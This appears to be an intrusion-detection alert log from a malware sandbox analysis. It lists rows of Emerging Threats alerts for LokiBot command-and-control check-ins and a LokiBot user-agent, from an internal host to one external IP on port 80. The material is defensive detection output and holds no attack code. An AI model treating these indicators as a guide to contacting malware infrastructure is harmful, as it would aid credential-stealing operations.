2024-09-25T15:30:39.444328+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	56003	188.114.96.3	80	TCP
2024-09-25T15:30:40.283415+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	56004	188.114.96.3	80	TCP
2024-09-25T15:30:41.170973+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	56005	188.114.96.3	80	TCP
2024-09-25T15:30:42.064291+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	56006	188.114.96.3	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T15:28:36.808752+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49730	188.114.96.3	80	TCP
2024-09-25T15:28:37.787248+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49731	188.114.96.3	80	TCP
2024-09-25T15:28:38.549981+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49732	188.114.96.3	80	TCP
2024-09-25T15:28:39.422340+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49733	188.114.96.3	80	TCP
2024-09-25T15:28:40.334278+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49734	188.114.96.3	80	TCP
2024-09-25T15:28:41.272883+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49735	188.114.96.3	80	TCP
2024-09-25T15:28:42.154915+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49736	188.114.96.3	80	TCP
2024-09-25T15:28:43.005872+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49737	188.114.96.3	80	TCP
2024-09-25T15:28:44.024460+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49738	188.114.96.3	80	TCP
2024-09-25T15:28:44.864953+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49739	188.114.96.3	80	TCP
2024-09-25T15:28:45.794467+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49740	188.114.96.3	80	TCP
2024-09-25T15:28:46.586604+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49741	188.114.96.3	80	TCP
2024-09-25T15:28:47.459806+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49743	188.114.96.3	80	TCP
2024-09-25T15:28:48.329147+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49745	188.114.96.3	80	TCP
2024-09-25T15:28:49.199142+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49747	188.114.96.3	80	TCP
2024-09-25T15:28:50.188831+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49749	188.114.96.3	80	TCP
2024-09-25T15:28:51.102415+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55890	188.114.96.3	80	TCP
2024-09-25T15:28:51.992772+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55892	188.114.96.3	80	TCP
2024-09-25T15:28:52.881678+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55893	188.114.96.3	80	TCP
2024-09-25T15:28:53.727656+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55894	188.114.96.3	80	TCP
2024-09-25T15:28:54.537764+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55895	188.114.96.3	80	TCP
2024-09-25T15:28:55.513579+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55896	188.114.96.3	80	TCP
2024-09-25T15:28:56.412404+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55897	188.114.96.3	80	TCP
2024-09-25T15:28:57.598723+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55898	188.114.96.3	80	TCP
2024-09-25T15:28:58.474678+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55899	188.114.96.3	80	TCP
2024-09-25T15:28:59.484196+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55900	188.114.96.3	80	TCP
2024-09-25T15:29:00.473536+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55901	188.114.96.3	80	TCP
2024-09-25T15:29:01.372433+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55902	188.114.96.3	80	TCP
2024-09-25T15:29:02.239881+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55903	188.114.96.3	80	TCP
2024-09-25T15:29:03.276280+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55904	188.114.96.3	80	TCP
2024-09-25T15:29:04.099861+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55905	188.114.96.3	80	TCP
2024-09-25T15:29:04.914672+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55906	188.114.96.3	80	TCP
2024-09-25T15:29:05.723093+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55907	188.114.96.3	80	TCP
2024-09-25T15:29:06.587971+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55908	188.114.96.3	80	TCP
2024-09-25T15:29:07.449997+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55909	188.114.96.3	80	TCP
2024-09-25T15:29:08.319578+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55910	188.114.96.3	80	TCP
2024-09-25T15:29:09.181026+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55911	188.114.96.3	80	TCP
2024-09-25T15:29:10.039622+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55912	188.114.96.3	80	TCP
2024-09-25T15:29:10.892410+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55913	188.114.96.3	80	TCP
2024-09-25T15:29:11.755447+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55914	188.114.96.3	80	TCP
2024-09-25T15:29:12.608011+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55915	188.114.96.3	80	TCP
2024-09-25T15:29:13.487014+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55916	188.114.96.3	80	TCP
2024-09-25T15:29:14.457362+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55917	188.114.96.3	80	TCP
2024-09-25T15:29:15.345683+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55918	188.114.96.3	80	TCP
2024-09-25T15:29:16.357807+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55919	188.114.96.3	80	TCP
2024-09-25T15:29:17.230322+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55920	188.114.96.3	80	TCP
2024-09-25T15:29:18.111648+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55921	188.114.96.3	80	TCP
2024-09-25T15:29:18.948583+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55922	188.114.96.3	80	TCP
2024-09-25T15:29:19.785848+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55923	188.114.96.3	80	TCP
2024-09-25T15:29:20.658125+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55924	188.114.96.3	80	TCP
2024-09-25T15:29:21.877333+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55925	188.114.96.3	80	TCP
2024-09-25T15:29:22.966391+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55926	188.114.96.3	80	TCP
2024-09-25T15:29:23.928498+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55927	188.114.96.3	80	TCP
2024-09-25T15:29:24.921645+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55928	188.114.96.3	80	TCP
2024-09-25T15:29:27.055675+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55929	188.114.96.3	80	TCP
2024-09-25T15:29:27.870221+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55931	188.114.96.3	80	TCP
2024-09-25T15:29:28.942773+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55932	188.114.96.3	80	TCP
2024-09-25T15:29:29.777253+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55933	188.114.96.3	80	TCP
2024-09-25T15:29:30.591674+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55934	188.114.96.3	80	TCP
2024-09-25T15:29:31.906770+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55935	188.114.96.3	80	TCP
2024-09-25T15:29:32.797954+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55936	188.114.96.3	80	TCP
2024-09-25T15:29:33.663752+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55937	188.114.96.3	80	TCP
2024-09-25T15:29:34.519787+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55938	188.114.96.3	80	TCP
2024-09-25T15:29:35.353459+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55939	188.114.96.3	80	TCP
2024-09-25T15:29:36.192350+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55940	188.114.96.3	80	TCP
2024-09-25T15:29:37.117852+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55941	188.114.96.3	80	TCP
2024-09-25T15:29:38.099928+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55942	188.114.96.3	80	TCP
2024-09-25T15:29:39.059740+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55943	188.114.96.3	80	TCP
2024-09-25T15:29:39.928784+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55944	188.114.96.3	80	TCP
2024-09-25T15:29:40.808147+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55945	188.114.96.3	80	TCP
2024-09-25T15:29:41.638243+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55946	188.114.96.3	80	TCP
2024-09-25T15:29:42.475611+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55947	188.114.96.3	80	TCP
2024-09-25T15:29:43.324953+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55948	188.114.96.3	80	TCP
2024-09-25T15:29:44.263622+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55949	188.114.96.3	80	TCP
2024-09-25T15:29:45.374185+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55950	188.114.96.3	80	TCP
2024-09-25T15:29:46.306365+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55951	188.114.96.3	80	TCP
2024-09-25T15:29:47.360807+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55952	188.114.96.3	80	TCP
2024-09-25T15:29:48.414802+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55953	188.114.96.3	80	TCP
2024-09-25T15:29:49.677411+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55954	188.114.96.3	80	TCP
2024-09-25T15:29:50.524174+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55955	188.114.96.3	80	TCP
2024-09-25T15:29:51.428232+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55956	188.114.96.3	80	TCP
2024-09-25T15:29:52.541643+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55957	188.114.96.3	80	TCP
2024-09-25T15:29:53.383135+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55958	188.114.96.3	80	TCP
2024-09-25T15:29:54.258505+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55959	188.114.96.3	80	TCP
2024-09-25T15:29:55.425796+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55960	188.114.96.3	80	TCP
2024-09-25T15:29:56.224619+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55961	188.114.96.3	80	TCP
2024-09-25T15:29:57.052272+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55962	188.114.96.3	80	TCP
2024-09-25T15:29:58.164945+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55963	188.114.96.3	80	TCP
2024-09-25T15:29:58.987927+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55964	188.114.96.3	80	TCP
2024-09-25T15:29:59.835835+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55965	188.114.96.3	80	TCP
2024-09-25T15:30:00.716018+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55966	188.114.96.3	80	TCP
2024-09-25T15:30:01.920768+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55967	188.114.96.3	80	TCP
2024-09-25T15:30:02.761283+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55968	188.114.96.3	80	TCP
2024-09-25T15:30:03.946516+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55969	188.114.96.3	80	TCP
2024-09-25T15:30:05.226430+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55970	188.114.96.3	80	TCP
2024-09-25T15:30:06.440249+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55971	188.114.96.3	80	TCP
2024-09-25T15:30:07.613698+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55972	188.114.96.3	80	TCP
2024-09-25T15:30:08.520224+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55973	188.114.96.3	80	TCP
2024-09-25T15:30:09.339418+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55974	188.114.96.3	80	TCP
2024-09-25T15:30:10.220925+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55975	188.114.96.3	80	TCP
2024-09-25T15:30:11.026164+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55976	188.114.96.3	80	TCP
2024-09-25T15:30:12.218161+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55977	188.114.96.3	80	TCP
2024-09-25T15:30:13.173782+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55978	188.114.96.3	80	TCP
2024-09-25T15:30:13.993423+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55979	188.114.96.3	80	TCP
2024-09-25T15:30:14.842547+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55980	188.114.96.3	80	TCP
2024-09-25T15:30:15.691270+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55981	188.114.96.3	80	TCP
2024-09-25T15:30:16.551798+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55982	188.114.96.3	80	TCP
2024-09-25T15:30:17.497860+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55983	188.114.96.3	80	TCP
2024-09-25T15:30:18.363198+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55984	188.114.96.3	80	TCP
2024-09-25T15:30:19.199856+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55985	188.114.96.3	80	TCP
2024-09-25T15:30:20.095708+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55986	188.114.96.3	80	TCP
2024-09-25T15:30:21.507011+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55987	188.114.96.3	80	TCP
2024-09-25T15:30:23.134473+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55988	188.114.96.3	80	TCP
2024-09-25T15:30:24.350366+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55989	188.114.96.3	80	TCP
2024-09-25T15:30:25.290428+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55990	188.114.96.3	80	TCP
2024-09-25T15:30:26.169979+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55991	188.114.96.3	80	TCP
2024-09-25T15:30:27.001129+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55992	188.114.96.3	80	TCP
2024-09-25T15:30:27.899264+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55993	188.114.96.3	80	TCP
2024-09-25T15:30:28.753857+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55994	188.114.96.3	80	TCP
2024-09-25T15:30:29.618078+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55995	188.114.96.3	80	TCP
2024-09-25T15:30:30.428677+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55996	188.114.96.3	80	TCP
2024-09-25T15:30:31.273028+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55997	188.114.96.3	80	TCP
2024-09-25T15:30:32.135559+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55998	188.114.96.3	80	TCP
2024-09-25T15:30:33.256022+0200	2021641	1	A Network Trojan was detected	192.168.2.4	55999	188.114.96.3	80	TCP
2024-09-25T15:30:34.073488+0200	2021641	1	A Network Trojan was detected	192.168.2.4	56000	188.114.96.3	80	TCP
2024-09-25T15:30:35.801198+0200	2021641	1	A Network Trojan was detected	192.168.2.4	56001	188.114.96.3	80	TCP
2024-09-25T15:30:37.771542+0200	2021641	1	A Network Trojan was detected	192.168.2.4	56002	188.114.96.3	80	TCP
2024-09-25T15:30:38.713862+0200	2021641	1	A Network Trojan was detected	192.168.2.4	56003	188.114.96.3	80	TCP
2024-09-25T15:30:39.594556+0200	2021641	1	A Network Trojan was detected	192.168.2.4	56004	188.114.96.3	80	TCP
2024-09-25T15:30:40.433961+0200	2021641	1	A Network Trojan was detected	192.168.2.4	56005	188.114.96.3	80	TCP
2024-09-25T15:30:41.413983+0200	2021641	1	A Network Trojan was detected	192.168.2.4	56006	188.114.96.3	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T15:28:36.808752+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49730	188.114.96.3	80	TCP
2024-09-25T15:28:37.787248+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49731	188.114.96.3	80	TCP
2024-09-25T15:28:38.549981+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49732	188.114.96.3	80	TCP
2024-09-25T15:28:39.422340+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49733	188.114.96.3	80	TCP
2024-09-25T15:28:40.334278+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49734	188.114.96.3	80	TCP
2024-09-25T15:28:41.272883+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49735	188.114.96.3	80	TCP
2024-09-25T15:28:42.154915+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49736	188.114.96.3	80	TCP
2024-09-25T15:28:43.005872+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49737	188.114.96.3	80	TCP
2024-09-25T15:28:44.024460+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49738	188.114.96.3	80	TCP
2024-09-25T15:28:44.864953+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49739	188.114.96.3	80	TCP
2024-09-25T15:28:45.794467+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49740	188.114.96.3	80	TCP
2024-09-25T15:28:46.586604+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49741	188.114.96.3	80	TCP
2024-09-25T15:28:47.459806+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49743	188.114.96.3	80	TCP
2024-09-25T15:28:48.329147+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49745	188.114.96.3	80	TCP
2024-09-25T15:28:49.199142+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49747	188.114.96.3	80	TCP
2024-09-25T15:28:50.188831+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49749	188.114.96.3	80	TCP
2024-09-25T15:28:51.102415+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55890	188.114.96.3	80	TCP
2024-09-25T15:28:51.992772+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55892	188.114.96.3	80	TCP
2024-09-25T15:28:52.881678+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55893	188.114.96.3	80	TCP
2024-09-25T15:28:53.727656+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55894	188.114.96.3	80	TCP
2024-09-25T15:28:54.537764+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55895	188.114.96.3	80	TCP
2024-09-25T15:28:55.513579+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55896	188.114.96.3	80	TCP
2024-09-25T15:28:56.412404+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55897	188.114.96.3	80	TCP
2024-09-25T15:28:57.598723+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55898	188.114.96.3	80	TCP
2024-09-25T15:28:58.474678+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55899	188.114.96.3	80	TCP
2024-09-25T15:28:59.484196+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55900	188.114.96.3	80	TCP
2024-09-25T15:29:00.473536+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55901	188.114.96.3	80	TCP
2024-09-25T15:29:01.372433+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55902	188.114.96.3	80	TCP
2024-09-25T15:29:02.239881+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55903	188.114.96.3	80	TCP
2024-09-25T15:29:03.276280+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55904	188.114.96.3	80	TCP
2024-09-25T15:29:04.099861+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55905	188.114.96.3	80	TCP
2024-09-25T15:29:04.914672+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55906	188.114.96.3	80	TCP
2024-09-25T15:29:05.723093+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55907	188.114.96.3	80	TCP
2024-09-25T15:29:06.587971+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55908	188.114.96.3	80	TCP
2024-09-25T15:29:07.449997+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55909	188.114.96.3	80	TCP
2024-09-25T15:29:08.319578+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55910	188.114.96.3	80	TCP
2024-09-25T15:29:09.181026+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55911	188.114.96.3	80	TCP
2024-09-25T15:29:10.039622+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55912	188.114.96.3	80	TCP
2024-09-25T15:29:10.892410+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55913	188.114.96.3	80	TCP
2024-09-25T15:29:11.755447+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55914	188.114.96.3	80	TCP
2024-09-25T15:29:12.608011+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55915	188.114.96.3	80	TCP
2024-09-25T15:29:13.487014+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55916	188.114.96.3	80	TCP
2024-09-25T15:29:14.457362+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55917	188.114.96.3	80	TCP
2024-09-25T15:29:15.345683+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55918	188.114.96.3	80	TCP
2024-09-25T15:29:16.357807+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55919	188.114.96.3	80	TCP
2024-09-25T15:29:17.230322+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55920	188.114.96.3	80	TCP
2024-09-25T15:29:18.111648+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55921	188.114.96.3	80	TCP
2024-09-25T15:29:18.948583+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55922	188.114.96.3	80	TCP
2024-09-25T15:29:19.785848+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55923	188.114.96.3	80	TCP
2024-09-25T15:29:20.658125+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55924	188.114.96.3	80	TCP
2024-09-25T15:29:21.877333+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55925	188.114.96.3	80	TCP
2024-09-25T15:29:22.966391+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55926	188.114.96.3	80	TCP
2024-09-25T15:29:23.928498+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55927	188.114.96.3	80	TCP
2024-09-25T15:29:24.921645+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55928	188.114.96.3	80	TCP
2024-09-25T15:29:27.055675+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55929	188.114.96.3	80	TCP
2024-09-25T15:29:27.870221+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55931	188.114.96.3	80	TCP
2024-09-25T15:29:28.942773+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55932	188.114.96.3	80	TCP
2024-09-25T15:29:29.777253+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55933	188.114.96.3	80	TCP
2024-09-25T15:29:30.591674+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55934	188.114.96.3	80	TCP
2024-09-25T15:29:31.906770+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55935	188.114.96.3	80	TCP
2024-09-25T15:29:32.797954+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55936	188.114.96.3	80	TCP
2024-09-25T15:29:33.663752+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55937	188.114.96.3	80	TCP
2024-09-25T15:29:34.519787+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55938	188.114.96.3	80	TCP
2024-09-25T15:29:35.353459+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55939	188.114.96.3	80	TCP
2024-09-25T15:29:36.192350+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55940	188.114.96.3	80	TCP
2024-09-25T15:29:37.117852+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55941	188.114.96.3	80	TCP
2024-09-25T15:29:38.099928+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55942	188.114.96.3	80	TCP
2024-09-25T15:29:39.059740+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55943	188.114.96.3	80	TCP
2024-09-25T15:29:39.928784+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55944	188.114.96.3	80	TCP
2024-09-25T15:29:40.808147+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55945	188.114.96.3	80	TCP
2024-09-25T15:29:41.638243+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55946	188.114.96.3	80	TCP
2024-09-25T15:29:42.475611+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55947	188.114.96.3	80	TCP
2024-09-25T15:29:43.324953+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55948	188.114.96.3	80	TCP
2024-09-25T15:29:44.263622+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55949	188.114.96.3	80	TCP
2024-09-25T15:29:45.374185+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55950	188.114.96.3	80	TCP
2024-09-25T15:29:46.306365+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55951	188.114.96.3	80	TCP
2024-09-25T15:29:47.360807+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55952	188.114.96.3	80	TCP
2024-09-25T15:29:48.414802+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55953	188.114.96.3	80	TCP
2024-09-25T15:29:49.677411+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55954	188.114.96.3	80	TCP
2024-09-25T15:29:50.524174+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55955	188.114.96.3	80	TCP
2024-09-25T15:29:51.428232+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55956	188.114.96.3	80	TCP
2024-09-25T15:29:52.541643+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55957	188.114.96.3	80	TCP
2024-09-25T15:29:53.383135+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55958	188.114.96.3	80	TCP
2024-09-25T15:29:54.258505+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55959	188.114.96.3	80	TCP
2024-09-25T15:29:55.425796+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55960	188.114.96.3	80	TCP
2024-09-25T15:29:56.224619+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55961	188.114.96.3	80	TCP
2024-09-25T15:29:57.052272+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55962	188.114.96.3	80	TCP
2024-09-25T15:29:58.164945+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55963	188.114.96.3	80	TCP
2024-09-25T15:29:58.987927+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55964	188.114.96.3	80	TCP
2024-09-25T15:29:59.835835+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55965	188.114.96.3	80	TCP
2024-09-25T15:30:00.716018+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55966	188.114.96.3	80	TCP
2024-09-25T15:30:01.920768+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55967	188.114.96.3	80	TCP
2024-09-25T15:30:02.761283+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55968	188.114.96.3	80	TCP
2024-09-25T15:30:03.946516+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55969	188.114.96.3	80	TCP
2024-09-25T15:30:05.226430+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55970	188.114.96.3	80	TCP
2024-09-25T15:30:06.440249+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55971	188.114.96.3	80	TCP
2024-09-25T15:30:07.613698+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55972	188.114.96.3	80	TCP
2024-09-25T15:30:08.520224+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55973	188.114.96.3	80	TCP
2024-09-25T15:30:09.339418+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55974	188.114.96.3	80	TCP
2024-09-25T15:30:10.220925+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55975	188.114.96.3	80	TCP
2024-09-25T15:30:11.026164+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55976	188.114.96.3	80	TCP
